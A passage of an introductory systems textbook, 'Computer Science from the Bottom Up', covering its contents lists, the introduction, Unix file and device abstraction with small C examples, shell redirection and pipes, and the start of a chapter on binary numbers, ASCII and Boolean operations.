Assembly Generation  ........................................................................................ 114
Optimisation  ................................................................................................... 119
Assembler  ............................................................................................................... 120
Linker .................................................................................................................... 120
Symbols ......................................................................................................... 120
The linking process  .......................................................................................... 121
A practical example  ................................................................................................. 121
Compiling  ....................................................................................................... 122
Assembly  ....................................................................................................... 124
Linking .......................................................................................................... 125
The Executable  ................................................................................................ 126
8. Behind the process  ....................................................................................................... 130
Review of executable files  ........................................................................................ 130
Representing executable files  ..................................................................................... 130
Three Standard Sections  .................................................................................... 130
Binary Format  ................................................................................................. 130
Binary Format History  ...................................................................................... 130
ELF ....................................................................................................................... 131
ELF in depth  ................................................................................................... 131
Debugging  ...................................................................................................... 140
ELF Executables  ...................................................................................................... 145
Libraries ................................................................................................................. 146
Static Libraries  ................................................................................................ 146
Shared Libraries  .............................................................................................. 148
ABI's ..................................................................................................................... 148
Byte Order  ...................................................................................................... 148
Calling Conventions  ......................................................................................... 148
Starting a process  .................................................................................................... 149
Kernel communication to programs  ..................................................................... 149
Starting the program  ......................................................................................... 150
9. Dynamic Linking  ......................................................................................................... 155
Code Sharing  .......................................................................................................... 155
Dynamic Library Details  ................................................................................... 155
Including libraries in an executable  ..................................................................... 155
The Dynamic Linker  ................................................................................................ 157
Relocations  ..................................................................................................... 157
Position Independence  ...................................................................................... 159
Global Offset Tables  ................................................................................................ 159
The Global Offset Table  ................................................................................... 160
Libraries ................................................................................................................. 164
The Procedure Lookup Table  ............................................................................. 164
Working with libraries and the linker  .......................................................................... 171
Library versions  ............................................................................................... 171
Finding symbols  .............................................................................................. 174
Computer Science
from the Bottom Up
vi10. I/O Fundamentals  ....................................................................................................... 181
File System Fundamentals  ......................................................................................... 181
Networking Fundamentals  ......................................................................................... 181
Computer Science from the Bottom Up Glossary  .................................................................. 182
viiList of Figures
1.1. Abstraction  .................................................................................................................. 2
1.2. Default Unix Files  ......................................................................................................... 6
1.3. Abstraction  .................................................................................................................. 7
1.4. A pipe in action  ............................................................................................................ 9
2.1. Masking  ..................................................................................................................... 18
2.2. Types  ........................................................................................................................ 21
3.1. The CPU  ................................................................................................................... 33
3.2. Inside the CPU  ........................................................................................................... 35
3.3. Reorder buffer example  ................................................................................................ 36
3.4. Cache Associativity  ..................................................................................................... 40
3.5. Cache tags  ................................................................................................................. 41
3.6. Overview of handling an interrupt  .................................................................................. 43
3.7. Overview of a UHCI controller operation  ........................................................................ 45
3.8. A Hypercube  .............................................................................................................. 50
3.9. Acquire and Release semantics  ...................................................................................... 53
4.1. The Operating System  .................................................................................................. 58
4.2. The Operating System  .................................................................................................. 60
4.3. Rings  ......................................................................................................................... 70
4.4. x86 Segmentation Adressing  ......................................................................................... 72
4.5. x86 segments  .............................................................................................................. 73
5.1. The Elements of a Process  ............................................................................................ 76
5.2. The Stack  ................................................................................................................... 78
5.3. Process memory layout  ................................................................................................ 81
5.4. Threads  ...................................................................................................................... 85
5.5. The O(1) scheduler  ...................................................................................................... 89
6.1. Illustration of canonical addresses  .................................................................................. 94
6.2. Virtual memory pages  .................................................................................................. 95
6.3. Virtual Address Translation  ........................................................................................... 97
6.4. Segmentation  ............................................................................................................ 100
6.5. Linux address space layout  .......................................................................................... 104
6.6. Linux Three Level Page Table  ..................................................................................... 105
6.7. Illustration Itanium regions and protection keys  .............................................................. 106
6.8. Illustration of Itanium TLB translation  .......................................................................... 107
6.9. Illustration of a hierarchical page-table  .......................................................................... 109
6.10. Itanium short-format VHPT implementation  ................................................................. 110
6.11. Itanium PTE entry formats  ........................................................................................ 111
7.1. Alignment  ................................................................................................................ 115
7.2. Alignment  ................................................................................................................ 116
8.1. ELF Overview  .......................................................................................................... 132
9.1. Memory access via the GOT  ....................................................................................... 161
9.2. sonames  ................................................................................................................. 173
viiiList of Tables
1.1. Standard Files Provided by Unix  ..................................................................................... 5
1.2. Standard Shell Redirection Facilities  ................................................................................ 8
2.1. Binary  ....................................................................................................................... 11
2.2. 203 in base 10  ............................................................................................................ 11
2.3. 203 in base 2  .............................................................................................................. 11
2.4. Convert 203 to binary  .................................................................................................. 12
2.5. Bytes  ......................................................................................................................... 13
2.6. Truth table for not ....................................................................................................... 14
2.7. Truth table for and ...................................................................................................... 14
2.8. Truth table for or ........................................................................................................ 15
2.9. Truth table for xor ....................................................................................................... 15
2.10. Boolean operations in C  .............................................................................................. 16
2.11. Hexadecimal, Binary and Decimal  ................................................................................ 16
2.12. Convert 203 to hexadecimal  ........................................................................................ 17
2.13. Standard Integer Types and Sizes  ................................................................................. 22
2.14. Standard Scalar Types and Sizes  .................................................................................. 22
2.15. One's Complement Addition  ........................................................................................ 25
2.16. Two's Complement Addition  ....................................................................................... 26
2.17. IEEE Floating Point  ................................................................................................... 27
2.18. Scientific Notation for 1.98765x10^6  ............................................................................ 27
2.19. Significands in binary  ................................................................................................. 27
2.20. Example of normalising 0.375  ..................................................................................... 28
3.1. Memory Hierarchy  ...................................................................................................... 38
9.1. Relocation Example  ................................................................................................... 158
9.2. ELF symbol fields  ..................................................................................................... 174
ixList of Examples
1.1. Abstraction with function pointers  ................................................................................... 2
1.2. Abstraction in include/linux/virtio.h  .................................................................. 4
1.3. Example of major and minor numbers  .............................................................................. 7
2.1. Using flags  ................................................................................................................. 18
2.2. Example of warnings when types are not matched  ............................................................. 24
2.3. Floats versus Doubles  .................................................................................................. 27
2.4. Program to find first set bit  ........................................................................................... 29
2.5. Examining Floats  ........................................................................................................ 30
2.6. Analysis of 8.45 ........................................................................................................ 32
3.1. Memory Ordering  ........................................................................................................ 52
4.1. getpid() example  ......................................................................................................... 63
4.2. PowerPC system call example  ....................................................................................... 63
4.3. x86 system call example  ............................................................................................... 67
5.1. Stack pointer example  .................................................................................................. 79
5.2. pstree example ........................................................................................................... 83
5.3. Zombie example process  .............................................................................................. 87
5.4. Signals Example  .......................................................................................................... 91
7.1. Struct padding example  .............................................................................................. 116
7.2. Stack alignment example  ............................................................................................ 117
7.3. Page alignment manipulations  ...................................................................................... 118
7.4. Hello World  .............................................................................................................. 122
7.5. Function Example  ...................................................................................................... 122
7.6. Compilation Example  ................................................................................................. 122
7.7. Assembly Example  .................................................................................................... 124
7.8. Readelf Example  ....................................................................................................... 124
7.9. Linking Example  ....................................................................................................... 125
7.10. Executable Example  ................................................................................................. 126
8.1. The ELF Header  ........................................................................................................ 133
8.2. The ELF Header, as shown by readelf  ........................................................................... 133
8.3. Inspecting the ELF magic number  ................................................................................ 134
8.4. Investigating the entry point  ........................................................................................ 134
8.5. The Program Header  .................................................................................................. 135
8.6. Sections  ................................................................................................................... 136
8.7. Sections  ................................................................................................................... 137
8.8. Sections readelf output  ............................................................................................... 137
8.9. Sections and Segments  ............................................................................................... 139
8.10. Example of creating a core dump and using it with gdb TM ............................................... 140
8.11. Example of stripping debugging information into separate files using objcopy TM .................. 141
8.12. Example of using readelf TM and eu-readelf TM to examine a coredump.  ............................... 142
8.13. Segments of an executable file  ................................................................................... 145
8.14. Creating and using a static library  ............................................................................... 146
8.15. Disassembley of program startup  ................................................................................ 150
8.16. Constructors and Destructors  ...................................................................................... 152
9.1. Specifying Dynamic Libraries  ...................................................................................... 156
9.2. Looking at dynamic libraries  ....................................................................................... 156
9.3. Checking the program interpreter  ................................................................................. 157
9.4. Relocation as defined by ELF  ...................................................................................... 158
9.5. Specifying Dynamic Libraries  ...................................................................................... 159
9.6. Using the GOT  ......................................................................................................... 161
9.7. Relocations against the GOT  ....................................................................................... 163
9.8. Hello World PLT example  .......................................................................................... 164
Computer Science
from the Bottom Up
x9.9. Hello world main()  .................................................................................................... 165
9.10. Hello world sections  ................................................................................................. 165
9.11. Hello world PLT  ...................................................................................................... 167
9.12. Hello world GOT  ..................................................................................................... 168
9.13. Dynamic Segment  .................................................................................................... 169
9.14. Code in the dynamic linker for setting up special values (from libc sysdeps/ia64/dl-
machine.h ) .................................................................................................................. 170
9.15. Symbol definition from ELF  ...................................................................................... 174
9.16. Examples of symbol bindings  ..................................................................................... 175
9.17. Example of LD_PRELOAD  ........................................................................................ 177
9.18. Example of symbol versioning  ................................................................................... 178
xiIntroduction
Welcome
Welcome to Computer Science from the Bottom Up
Philosophy
In a nutshell, what you are reading is intended to be a shop class for computer science. Young computer
science students are taught to "drive" the computer; but where do you go to learn what is under the
hood? Trying to understand the operating system is unfortunately not as easy as just opening the bonnet.
The current Linux kernel runs into the millions of lines of code, add to that the other critical parts of
a modern operating system (the compiler, assembler and system libraries) and your code base becomes
unimaginable. Further still, add a University level operating systems course (or four), some good reference
manuals, two or three years of C experience and, just maybe, you might be able to figure out where to
start looking  to make sense of it all.
To keep with the car analogy, the prospective student is starting out trying to work on a Forumla One
engine without ever knowing how a two stroke motor operates. During their shop class the student should
pull apart, twist, turn and put back together that two stroke motor, and consequentially have a pretty good
framework for understanding just how the Formula One engine works. Nobody will expect them to be a
Formula One engineer, but they are well on their way!
Why from the bottom up ?
Not everyone wants to attend shop class. Most people only want to drive the car, not know how to build
one from scratch. Obviously any general computing curriculum has to take this into account else it won't
be relevant to its students. So computer science is taught from the "top down"; applications, high level
programming, software design and development theory, possibly data structures. Students will probably
be exposed to binary, hopefully binary logic, possibly even some low level concepts such as registers,
opcodes and the like at a superficial level.
This book aims to move in completely the opposite direction, working from operating systems
fundamentals through to how those applications are complied and executed.
Enabling technologies
This book is only possible thanks to the development of Open Source  technologies. Before Linux it was
like taking a shop course with a car that had it's bonnet welded shut; today we are in a position to open that
bonnet, poke around with the insides and, better still, take that engine and use it to do whatever we want.
1Chapter 1. General Unix and Advanced
C
Everything is a file!
An often quoted tenet of UNIX-like systems such as Linux or BSD is everything is a file .
Imagine a file in the context something familiar like a word processor. There are two fundamental
operations we could use on this imaginary word processing file:
1.Read it (existing saved data from the word processor).
2.Write to it (new data from the user).
Consider some of the common things attached to a computer and how they relate to our fundamental file
operations:
1.The screen
2.The keyboard
3.A printer
4.A CDROM
The screen and printer are both like a write-only file, but instead of being stored as bits on a disk the
information is displayed as dots on a screen or lines on a page. The keyboard is like a read only file, with
the data coming from keystrokes provided by the user. The CDROM is similar, but rather than randomly
coming from the user the data is stored directly on the disk.
Thus the concept of a file is a good abstraction  of either a a sink for, or source of, data. As such it is an
excellent abstraction of all the devices one might attach to the computer. This realisation is the great power
of UNIX and is evident across the design of the entire platform. It is one of the fundamental roles of the
operating system to provide this abstraction of the hardware to the programmer.
It is probably not too much of a strech to say abstraction is the primary concept that underpins all modern
computing. No one person can understand everythinig from designing a modern user-interface to the
internal workings of a modern CPU, much less build it all themselves. To programmers, abstractions are
the lingua franca  that allows us to collaborate and invent.
Learning to navigate across abstractions gives one greater insight into how to use the abstractions in the
best and most innovative ways. In this book, we are concerned with abstractions at the lowest layers;
bewteen applications and the operating-system and the operating-system and hardware. Above this lies
many more layers, each worthy of their own books. As these chapters progress, you will hopefully gain
some insight into the abstractions presented by a modern operating-system.
General Unix and Advanced C
2Figure 1.1. Abstraction
Spot the difference?
Implementing abstraction
In general, abstraction is implemented by what is generically termed an Application Programming
Interface (API). API is a somewhat nebulous term that means different things in the context of various
programming endavours. Fundamentally, a programmer designs a set of functions and documents their
interface and functionality with the principle that the actual implementation providing the API is opaque.
For example, many large web-applications provide an API accessible via HTTP. Accessing data via this
method surely triggers many complicated series of remote-procedure calls, database queries and data
transfer; all of which is opaque to the end user who simply receives the contracted data.
Those familiar with object-oriented  languages such as Java, Python or C++ would be familiar with the
abstraction provided by classes. Methods provide the interface to the class, but abstract the implementation.
Implementing abstraction with C
A common method used in the Linux Kernel and other large C code bases, which lacks a built-in concept
of object-orientation, is function pointers . Learning to read this idom is key to navigating most large C
code-bases. By understanding how to read the abstractions provided within the code an understanding of
internal API designs can be built.
Example 1.1. Abstraction with function pointers
#include <stdio.h>
/* The API to implement */
struct greet_api
{
 int (*say_hello)(char *name);
 int (*say_goodbye)(void);
};
/* Our implementation of the hello function */
General Unix and Advanced C
3int say_hello_fn(char *name)
{
 printf("Hello %s\n", name);
 return 0;
}
/* Our implementation of the goodbye function */
int say_goodbye_fn(void)
{
 printf("Goodbye\n");
 return 0;
}
/* A struct implementing the API */
struct greet_api greet_api =
{
 .say_hello = say_hello_fn,
 .say_goodbye = say_goodbye_fn
};
/* main() doesn't need to know anything about how the
 * say_hello/goodbye works, it just knows that it does */
int main(int argc, char *argv[])
{
 greet_api.say_hello(argv[1]);
 greet_api.say_goodbye();
 printf("%p, %p, %p\n", greet_api.say_hello, say_hello_fn, &say_hello_fn);
 exit(0);
}
Code such as the above is the simplest example of constructs used repeatedly through the Linux Kernel
and other C programs. Lets have a look at some specific elements.
We start out with a structure that defines the API ( struct greet_api ). The functions whose names are
encased in parenthesis with a pointer marker describe a function pointer1. The function pointer describes
the prototype  of function it must point to; pointing it at a function without the correct return type or
parameters will generate a compiler warning at least; if left in code will likely lead to incorrect operation
or crashes.
We then have our implementation of the API. Often for more complex functionality you will see an
idiom where API implementation functions will only be a wrapper around another function that is
conventionally prepended with one or or two underscores2 (i.e. say_hello_fn()  would call another
function _say_hello_function() ). This has several uses; generally it relates to having simpler and
smaller parts of the API (marshalling or checking arguments, for example) separate to more complex
implemenation, which often eases the path to significant changes in the internal workings whilst ensuring
the API remains constant. Our implementation is very simple however, and doesn't even need it's own
support functions. In various projects, single, double or even triple underscore function prefixes will mean
different things, but universally it is a visual warning that the function is not supposed to be called directly
from "beyond" the API.
1Often you will see that the names of the parameters are omitted, and only the type of the parameter is specified. This allows the implementer to
specify their own parameter names avoiding warnings from the compiler.
2A double-underscore function __foo may conversationally be referred to as "dunder foo".
General Unix and Advanced C
4Second to last, we fill out the function pointers in struct greet_api greet_api . The name of the
function is a pointer, therefore there is no need to take the address of the function (i.e. &say_hello_fn ).
Finally we can call the API functions through the structure in main.
You will see this idiom constantly when navigating the souce code. The tiny example below is taken from
include/linux/virtio.h  in the Linux kernel source to illustrate:
Example 1.2. Abstraction in include/linux/virtio.h
/**
 * virtio_driver - operations for a virtio I/O driver
 * @driver: underlying device driver (populate name and owner).
 * @id_table: the ids serviced by this driver.
 * @feature_table: an array of feature numbers supported by this driver.
 * @feature_table_size: number of entries in the feature table array.
 * @probe: the function to call when a device is found.  Returns 0 or -errno.
 * @remove: the function to call when a device is removed.
 * @config_changed: optional function to call when the device configuration
 *    changes; may be called in interrupt context.
 */
struct virtio_driver {
        struct device_driver driver;
        const struct virtio_device_id *id_table;
        const unsigned int *feature_table;
        unsigned int feature_table_size;
        int (*probe)(struct virtio_device *dev);
        void (*scan)(struct virtio_device *dev);
        void (*remove)(struct virtio_device *dev);
        void (*config_changed)(struct virtio_device *dev);
#ifdef CONFIG_PM
        int (*freeze)(struct virtio_device *dev);
        int (*restore)(struct virtio_device *dev);
#endif
};
It's only necessary to vaguely understand that this structure is a description of a virtual I/O device. We can
see the user of this API (the device driver author) is expected to provide a number of functions that will be
called under various conditions during system operation (when probing for new hardware, when hardware
is removed, etc). It also contains a range of data; structures which should be filled with relevant data.
Starting with descriptors like this is usually the easiest way into understanding the various layers of kernel
code.
Libraries
Libraries have two roles which illustrate abstraction.
•Allow programmers to reuse commonly accessed code.
•Act as a black box  implementing functionality for the programmer.
For example, a library implementing access to the raw data in JPEG files has both the advantage that the
many programs who wish to access image files can all use the same library and the programmers building
General Unix and Advanced C
5these programs do not need to worry about the exact details of the JPEG file format, but can concentrate
their efforts on what their program wants to do with the image.
The standard library of a UNIX platform is generically referred to as libc. It provides the basic interface
to the system: fundamental calls such as read(), write()  and printf() . This API is described in
its entirety by a specification called POSIX. It is freely available online and describes the many calls that
make up the standard UNIX API.
Most UNIX platforms broadly follow the POSIX standard, though often differ small but sometimes
important ways (hence the complexity of the various GNU autotools, which often tries to abstract away
these differences for you). Linux has many interfaces that are not specified by POSIX; writing applications
that use them exclusively will make your application less portable.
Libraries are a fundamental abstraction with many details. Later chapters will describe how libraries work
in much greater detail.
File Descriptors
One of the first things a UNIX programmer learns is that every running program starts with three files
already opened:
Table 1.1. Standard Files Provided by Unix
Descriptive Name File Number Description
Standard In 0 Input from the keyboard
Standard Out 1 Output to the console
Standard Error 2 Error output to the console
General Unix and Advanced C
6Figure 1.2. Default Unix Files
Standard Input
Standard Output
Standard ErrorDefault Unix Files
This raises the question what an open file represents. The value returned by an open call is termed a file
descriptor  and is essentially an index into an array of open files kept by the kernel.
General Unix and Advanced C
7Figure 1.3. Abstraction
device_read()
device_write()
device_read()
device_write()
device_read()
device_write()Device Drivers
0
1
2
3
MAX_FDDevice Layer
/dev/input
/dev/tty
/dev/sr0Opening the file
associates a descriptor
with the associated device
int fd = open("/dev/sr0");with the kernel
which gives them a fileDevices register
int ret = read(fd, &input, count);
File Descriptors1 2
Further references
to the descriptor
are routed to the device3
File descriptors are an index into a file-descriptor table stored by the kernel. The kernel creates a file-
descriptor in response to an open call and associates the file-descriptor with some abstraction of an
underlying file-like object; be that an actual hardware device, or a file-system or something else entirely.
Consequently a processes read or write calls that reference that file-descriptor are routed to the correct
place by the kernel to ultimately do something useful.
In short, the file-descriptor is the gateway into the kernel's abstractions of underlying hardware. An overall
view of the abstraction for physical-devices is shown in Figure 1.3, “Abstraction” .
Starting at the lowest level, the operating system requires a programmer to create a device-driver  to be able
to communicate with a hardware device. This device-driver is written to an API provided by the kernel
just like in Example 1.2, “Abstraction in include/linux/virtio.h ”; the device-driver will provide
a range of functions which are called by the kernel in response to various requirements. In the simplified
example above, we can see the drivers provide a read and write function that will be called in response
to the analogous operations on the file-descriptor. The device-driver knows how to convert these generic
requests into specific requests or commands for a particular device.
To provide the abstraction to user-space, the kernel provides a file-interface via what is generically termed
a device layer . Physical devices on the host are represented by a file in a special file-system such as /dev.
In UNIX-like systems, so called device-nodes  have what are termed a major and a minor number which
allows the kernel to associate particular nodes with their underlying driver. These can be identified via ls
as illustrated in Example 1.3, “Example of major and minor numbers” .
Example 1.3. Example of major and minor numbers
$ ls -l /dev/null /dev/zero /dev/tty
crw-rw-rw- 1 root root 1, 3 Aug 26 13:12 /dev/null
General Unix and Advanced C
8crw-rw-rw- 1 root root 5, 0 Sep  2 15:06 /dev/tty
crw-rw-rw- 1 root root 1, 5 Aug 26 13:12 /dev/zero
This brings us to the file-descriptor, which is the handle user-space uses to talk to the underlying device.
In a broad-sense, what happens when a file is opened is that the kernel is using the path information to
map the file-descriptor with something that provides an appropriate read and write, etc. API. When
this open is for a device ( /dev/sr0  above), the major and minor number of the opened device-node
provides the information the kernel needs to find the correct device-driver and complete the mapping. The
kernel will then know how to route further calls such as read to the underlying functions provided by
the device-driver.
A non-device file operates similarly, although there are more layers in-between. The abstraction here is
the mount-point ; mounting a file-system has the dual purpose of setting up a mapping so the file-system
knows the underlying device that provides the storage and the kernel knows that files opened under that
mount-point should be directed to the file-system driver. Like device-drivers, file-systems are written to
a particular generic file-system API provided by the kernel.
There are indeed many other layers that complicate the picture in real-life. For example, the kernel will go
to great efforts to cache as much data from disks as possible in otherwise free-memory; this provides many
speed advantages. It will also try to organise device access in the most efficient ways possible; for example
trying to order disk-access to ensure data stored physically close to each other is retrieved together, even if
the requests did not arrive in such an order. Further, many devices are of a more generic class such as USB
or SCSI devices which provide their own abstraction layers to write too. Thus rather than writing directly
to devices, file-systems will go through these many layers. Understanding the kernel is to understand how
these many APIs interrelate and coexist.
The Shell
The shell is the gateway to interacting with the operating system. Be it bash, zsh, csh or any of the
many other shells, they all fundamentally have only one major task — to allow you to execute programs
(you will begin to understand how the shell actually does this when we talk about some of the internals
of the operating system later).
But shells do much more than allow you to simply execute a program. They have powerful abilities to
redirect files, allow you to execute multiple programs simultaneously and script complete programs. These
all come back to the everything is a file  idiom.
Redirection
Often we do not want the standard file descriptors mentioned in the section called “File Descriptors”  to
point to their default places. For example, you may wish to capture all the output of a program into a file
on disk, or, alternatively have it read its commands from a file you prepared earlier. Another useful task
might like to pass the output of one program to the input of another. With the operating system, the shell
facilitates all this and more.
Table 1.2. Standard Shell Redirection Facilities
Name Command Description Example
Redirect to a file > filename Take all output from
standard out and place
it into filename . Note
using >> will append
to the file, rather than
overwrite it.ls > filename
General Unix and Advanced C
9Name Command Description Example
Read from a file < filename Copy all data from the
file to the standard input
of the programecho < filename
Pipe program1 |
program2Take everything from
standard out of
program1  and pass it
to standard input of
program2ls | more
Implementing pipe
The implementation of ls | more  is just another example of the power of abstraction. What
fundamentally happens here is that instead of associating the file-descriptor for the standard-output with
some sort of underlying device (such as the console, for output to the terminal), the descriptor is pointed
to an in-memory buffer provided by the kernel commonly termed a pipe. The trick here is that another
process can associate its standard input with the other-side of this same buffer and effectively consume
the output of the other process. This is illustrated in Figure 1.4, “A pipe in action”
Figure 1.4. A pipe in action
BufferFile Descriptors
0
1
2
3
MAX_FDFile Descriptors
0
1
2
3
MAX_FD$ ls | more
write()read()KernelUser
pipels more
The pipe is an in-memory buffer that connects two processes together. File-descriptors point to the pipe
object, which buffers data sent to it (via a write) to be drained (via a read)
Writes to the pipe are stored by the kernel until a corresponding read from the other side drains the buffer.
This is a very powerful concept and is one of the fundamental forms of inter-process communication
or IPC in UNIX like operating systems. The pipe allows more than just a data transfer; it can act as a
signaling channel. If a process reads an empty pipe, it will by default block or be put into hibernation
until there is some data available (this is discussed in much greater depth in Chapter 5, The Process . Thus
two processes may use a pipe to communicate that some action has been taken just by writing a byte of
data; rather than the actual data being important, the mere presence of any data in the pipe can signal a
message. Say for example one process requests that another print a file - something that will take some
time. The two processes may setup a pipe between themselves where the requesting process does a read
on the empty pipe; being empty that call blocks and the process does not continue. Once the print is done,
the other process can write a message into the pipe, which effectively wakes up the requesting process
and signals the work is done.
General Unix and Advanced C
10Allowing processes to pass data between each other like this springs another common UNIX idiom of
small tools doing one particular thing. Chaining these small tools gives a flexibility that a single monolithic
tool often can not.
11Chapter 2. Binary and Number
Representation
Binary -- the basis of computing
Binary Theory
Introduction
Binary is a number system which builds numbers from elements called bits. Each bit can be represented
by any two mutually exclusive states. Generally, when we write it down or code bits, we represent them
with 1 and 0. We also talk about them being true and false, and the computer internally represents bits
with high and low voltages.
We build binary numbers the same way we build numbers in our traditional base 10 system. However,
instead of a one's column, a 10's column, a 100's column (and so on) we have a one's column, a two's
columns, a four's column, an eight's column, and so on, as illustrated below.
Table 2.1. Binary
2...26252423222120
... 64 32 16 8 4 2 1
For example, to represent the number 203 in base 10, we know we place a 3 in the 1's column, a 0 in the
10's column and a 2 in the 100's column. This is expressed with exponents in the table below.
Table 2.2. 203 in base 10
102101100
2 0 3
Or, in other words, 2 × 102 + 3 × 100 = 200 + 3 = 203. To represent the same thing in binary, we would
have the following table.
Table 2.3. 203 in base 2
2726252423222120
1 1 0 0 1 0 1 1
That equates to 27 + 26 + 23+21 + 20 = 128 + 64 + 8 + 2 + 1 = 203.
Conversion
The easiest way to convert between bases is to use a computer, after all, that's what they're good at!
However, it is often useful to know how to do conversions by hand.
The easiest method to convert between bases is repeated division . To convert, repeatedly divide the
quotient by the base, until the quotient is zero, making note of the remainders at each step. Then, write
Binary and Number Representation
12the remainders in reverse, starting at the bottom and appending to the right each time. An example should
illustrate; since we are converting to binary we use a base of 2.
Table 2.4. Convert 203 to binary
Quotient Remainder
20310 ÷ 2 = 101 1
10110 ÷ 2 = 50 1↑
5010 ÷ 2 = 25 0↑
2510 ÷ 2 = 12 1↑
1210 ÷ 2 = 6 0↑
610 ÷ 2 = 3 0↑
310 ÷ 2 = 1 1↑
110 ÷ 2 = 0 1↑
Reading from the bottom and appending to the right each time gives 11001011 , which we saw from the
previous example was 203.
Bits and Bytes
To represent all the letters of the alphabet we would need at least enough different combinations to
represent all the lower case letters, the upper case letters, numbers and punctuation, plus a few extras.
Adding this up means we need probably around 80 different combinations.
If we have two bits, we can represent four possible unique combinations ( 00 01 10 11 ). If we have
three bits, we can represent 8 different combinations. As we saw above, with n bits we can represent 2n
unique combinations.
8 bits gives us 28 = 256 unique representations, more than enough for our alphabet combinations. We
call a group of 8 bits a byte. Guess how bit a C char variable is? One byte.
ASCII
Given that a byte can represent any of the values 0 through 256, anyone could arbitrarily make up a mapping
between characters and numbers. For example, a video card manufacturer could decide that the value 10
represents A, so when value 10 is sent to the video card it displays a capital 'A' on the screen.
To avoid this happening, the American Standard Code for Information Interchange  or ASCII was invented.
This is a 7-bit code, meaning there are 27 or 128 available codes.
The range of codes is divided up into two major parts; the non-printable and the printable. Printable
characters are things like characters (upper and lower case), numbers and punctuation. Non-printable codes
are for control, and do things like make a carriage-return, ring the terminal bell or the special NULL code
which represents nothing at all.
127 unique characters is sufficient for American English, but becomes very restrictive when one wants
to represent characters common in other languages, especially Asian languages which can have many
thousands of unique characters.
To alleviate this, modern systems are moving away from ASCII to Unicode, which can use up to 4 bytes
to represent a character, giving much more room!
Binary and Number Representation
13Parity
ASCII, being only a 7-bit code, leaves one bit of the byte spare. This can be used to implement parity
which is a simple form of error checking. Consider a computer using punch-cards for input, where a hole
represents 1 and no hole represents 0. Any inadvertent covering of a hole will cause an incorrect value to
be read, causing undefined behaviour.
Parity allows a simple check of the bits of a byte to ensure they were read correctly. We can implement
either odd or even parity by using the extra bit as a parity bit.
In odd parity, if the number of 1's in the 7 bits of information is odd, the parity bit is set, otherwise it is
not set. Even parity is the opposite; if the number of 1's is even the parity bit is set to 1.
In this way, the flipping of one bit will case a parity error, which can be detected.
XXX more about error correcting
16, 32 and 64 bit computers
Numbers do not fit into bytes; hopefully your bank balance in dollars will need more range than can fit
into one byte! Most modern architectures are 32 bit computers. This means they work with 4 bytes at a
time when processing and reading or writing to memory. We refer to 4 bytes as a word; this is analogous
to language where letters (bits) make up words in a sentence, except in computing every word has the
same size! The size of a C it variable is 32 bits. Newer architectures are 64 bits, which doubles the size
the processor works with (8 bytes).
Kilo, Mega and Giga Bytes
Computers deal with a lot of bytes; that's what makes them so powerful!
We need a way to talk about large numbers of bytes, and a natural way is to use the "International System
of Units" (SI) prefixes as used in most other scientific areas. So for example, kilo refers to 103 or 1000
units, as in a kilogram has 1000 grams.
1000 is a nice round number in base 10, but in binary it is 1111101000  which is not a particularly
"round" number. However, 1024 (or 210) is (10000000000 ), and happens to be quite close to the base
ten meaning of kilo (1000 as opposed to 1024).
Hence 1024 bytes became known as a kilobyte. The first mass market computer was the Commodore 64,
so named because it had 64 kilobytes of storage.
Today, kilobytes of memory would be small for a wrist watch, let alone a personal computer. The next SI
unit is "mega" for 106. As it happens, 220 is again close to the SI base 10 definition; 1048576 as opposed
to 1000000.
The units keep increasing by powers of 10; each time it diverges further from the base SI meaning.
Table 2.5. Bytes
210Kilobyte
220Megabyte
230Gigabyte
240Terrabyte
250Petabyte
Binary and Number Representation
14260Exabyte
Therefore a 32 bit computer can address up to four gigabytes of memory; the extra two bits can represent
four groups of 230 bytes. . A 64 bit computer can address up to 8 exabytes; you might be interested in
working out just how big a number this is! To get a feel for how bit that number is, calculate how long it
would take to count to 264 if you incremented once per second.
Kilo, Mega and Giga Bits
Apart from the confusion related to the overloading of SI units between binary and base 10, capacities will
often be quoted in terms of bits rather than bytes.
Generally this happens when talking about networking or storage devices; you may have noticed that your
ADSL connection is described as something like 1500 kilobits/second. The calculation is simple; multiply
by 1000 (for the kilo), divide by 8 to get bytes and then 1024 to get kilobytes (so 1500 kilobits/s=183
kilobytes per second).
The SI standardisation body has recognised these dual uses, and has specified unique prefixes for binary
usage. Under the standard 1024 bytes is a kibibyte , short for kilo binary  byte (shortened to KiB). The
other prefixes have a similar prefix (Mebibyte, for example). Tradition largely prevents use of these terms,
but you may seem them in some literature.
Boolean Operations
George Boole was a mathematician who discovered a whole area of mathematics called Boolean Algebra .
Whilst he made his discoveries in the mid 1800's, his mathematics are the fundamentals of all computer
science. Boolean algebra is a wide ranging topic, we present here only the bare minimum to get you started.
Boolean operations simply take a particular input and produce a particular output following a rule. For
example, the simplest boolean operation, not simply inverts the value of the input operand. Other operands
usually take two inputs, and produce a single output.
The fundamental Boolean operations used in computer science are easy to remember and listed below.
We represent them below with truth tables ; they simply show all possible inputs and outputs. The term
true simply reflects 1 in binary.
Not
Usually represented by !, not simply inverts the value, so 0 becomes 1 and 1 becomes 0
Table 2.6. Truth table for not
Input Output
1 0
0 1
And
To remember how the and operation works think of it as "if one input and the other are true, result is true
Table 2.7. Truth table for and
Input 1 Input 2 Output
0 0 0
Binary and Number Representation
15Input 1 Input 2 Output
1 0 0
0 1 0
1 1 1
Or
To remember how the or operation works think of it as "if one input or the other input is true, the result
is true
Table 2.8. Truth table for or
Input 1 Input 2 Output
0 0 0
1 0 1
0 1 1
1 1 1
Exclusive Or (xor)
Exclusive or, written as xor is a special case of or where the output is true if one, and only one, of the
inputs is true. This operation can surprisingly do many interesting tricks, but you will not see a lot of it
in the kernel.
Table 2.9. Truth table for xor
Input 1 Input 2 Output
0 0 0
1 0 1
0 1 1
1 1 0
How computers use boolean operations
Believe it or not, essentially everything your computer does comes back to the above operations. For
example, the half adder is a type of circuit made up from boolean operations that can add bits together
(it is called a half adder because it does not handle carry bits). Put more half adders together, and you
will start to build something that can add together long binary numbers. Add some external memory, and
you have a computer.
Electronically, the boolean operations are implemented in gates made by transistors . This is why you
might have heard about transistor counts and things like Moores Law. The more transistors, the more gates,
the more things you can add together. To create the modern computer, there are an awful lot of gates, and
an awful lot of transistors. Some of the latest Itanium processors have around 460 million transistors.
Working with binary in C
In C we have a direct interface to all of the above operations. The following table describes the operators
Binary and Number Representation
16Table 2.10. Boolean operations in C
Operation Usage in C
not !
and &
or |
xor ^
We use these operations on variables to modify the bits within the variable. Before we see examples of
this, first we must divert to describe hexadecimal notation.
Hexadecimal
Hexadecimal refers to a base 16 number system. We use this in computer science for only one reason,
it makes it easy for humans to think about binary numbers. Computers only ever deal in binary and
hexadecimal is simply a shortcut for us humans trying to work with the computer.
So why base 16? Well, the most natural choice is base 10, since we are used to thinking in base 10 from
